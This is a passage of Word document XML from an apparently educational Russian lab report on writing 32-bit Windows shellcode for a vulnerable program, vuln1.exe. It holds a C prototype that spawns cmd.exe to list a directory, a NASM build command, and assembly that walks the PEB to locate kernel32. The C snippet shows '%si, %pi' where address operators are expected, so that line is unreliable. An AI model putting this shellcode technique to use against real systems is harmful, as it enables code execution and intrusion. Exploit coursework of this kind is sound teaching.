      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    STARTUPINFO </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t xml:space="preserve"> = { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>) };</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t xml:space="preserve">    PROCESS_INFORMATION pi;</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t xml:space="preserve">    char </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t xml:space="preserve">[] = "cmd.exe /c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t xml:space="preserve"> c:\\Windows &gt; output.txt";</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t xml:space="preserve">    if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>CreateProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t xml:space="preserve">(NULL, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>, NULL, NULL, FALSE, 0, NULL, NULL, %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>, %pi))</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>CloseHandle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>pi.hProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>CloseHandle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>pi.hThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1FB69F" w14:textId="1DB62AAF" w:rsidR="00BC2756" w:rsidRDefault="00B57CCC" w:rsidP="003409E1">
      <w:r>
        <w:t xml:space="preserve">Соответствующий </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> должен выполнить следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695815A3" w14:textId="523B23E3" w:rsidR="00B57CCC" w:rsidRDefault="00B57CCC" w:rsidP="00B57CCC">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Создать процесс, в котором выполнится команда;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DC5A87" w14:textId="4491255E" w:rsidR="00B57CCC" w:rsidRDefault="00B57CCC" w:rsidP="00B57CCC">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выполнить команду </w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:t xml:space="preserve">cmd.exe /c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>c:\\Windows &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t xml:space="preserve"> output.txt</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85D288" w14:textId="591138FD" w:rsidR="00B57CCC" w:rsidRDefault="00F713DD" w:rsidP="00B57CCC">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Завершить выполнение программы</w:t>
      </w:r>
      <w:r w:rsidR="00B57CCC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2D0E2C" w14:textId="5C99282B" w:rsidR="00491AFF" w:rsidRDefault="00491AFF" w:rsidP="00F07134">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> будет собран в </w:t>
      </w:r>
      <w:r w:rsidRPr="00491AFF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00491AFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файл при помощи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NASM</w:t>
      </w:r>
      <w:r w:rsidRPr="00491AFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>командой:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE8268F" w14:textId="2BEC508F" w:rsidR="00491AFF" w:rsidRPr="004D4772" w:rsidRDefault="00491AFF" w:rsidP="00491AFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491AFF">
        <w:t>nasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491AFF">
        <w:t xml:space="preserve"> -f bin shellcode.asm -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491AFF">
        <w:t>shellcode.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CF460D3" w14:textId="148D544E" w:rsidR="00796F11" w:rsidRPr="00796F11" w:rsidRDefault="00796F11" w:rsidP="00796F11">
      <w:r>
        <w:t xml:space="preserve">Для того, чтобы собрать код под 32-битную программу (таковой является </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="00796F11">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00796F11">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в начале </w:t>
      </w:r>
      <w:r w:rsidRPr="00796F11">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796F11">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файла явно указывается </w:t>
      </w:r>
      <w:r w:rsidRPr="00796F11">
        <w:t>[BITS 32]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008B223" w14:textId="5BAE0C10" w:rsidR="00F07134" w:rsidRDefault="00A848E7" w:rsidP="00F07134">
      <w:r>
        <w:t xml:space="preserve">Вычисление адреса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07134">
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="000C4F35">
        <w:t xml:space="preserve"> для</w:t>
      </w:r>
      <w:r w:rsidR="00F07134">
        <w:t xml:space="preserve"> получения из него в дальнейшем адресов требуемых функций </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F07134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CreateProcessA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00781CC6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00781CC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E4FEE" w:rsidRPr="006E4FEE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E4FEE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CloseHandle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00491AFF">
        <w:t xml:space="preserve"> выполняет следующий код</w:t>
      </w:r>
      <w:r w:rsidR="00781CC6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E6F09E" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t>section .text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9ACF9" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    global _start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315DA28D" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7031C9BF" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t>_start:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41158C03" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    ; Получение PEB через TEB (Thread Environment Block)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A93105" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FCA762A" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="007C4A57" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    add</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00462DFF">
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00462DFF">
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">10            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00462DFF">
        <w:t>EAX</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00462DFF">
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">10 (смещение к </w:t>
      </w:r>
      <w:r w:rsidRPr="00462DFF">
        <w:t>PEB</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="00462DFF">
        <w:t>TEB</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75241214" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>fs:eax</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>+0x20] ; PEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D68DE5" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>fs:eax</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>+0x20] ; PEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590E2AC9" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> [eax+0x0c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>] ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> PEB-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>Ldr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F8C3B63" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> [eax+0x14</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>] ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>Ldr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>InMemoryOrderModuleList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11CEFAB1" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">   ; Первый модуль (ntdll.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7414D8" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C507352" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">   ; Второй модуль (kernel32.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5564C3E4" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15BBD706" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRPr="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> [eax+0x10</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>] ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> kernel32.dll base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C00496D" w14:textId="77777777" w:rsidR="00462DFF" w:rsidRDefault="00462DFF" w:rsidP="00462DFF">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00462DFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E60B622" w14:textId="4BEBB15E" w:rsidR="00FB7BE9" w:rsidRDefault="00FB7BE9" w:rsidP="00462DFF">
      <w:r>
        <w:t xml:space="preserve">Затем на стек передается строка с нужной командой, для получения требуемого представления команды (перевернутого) использовался </w:t>
      </w:r>
      <w:r>
        <w:rPr>
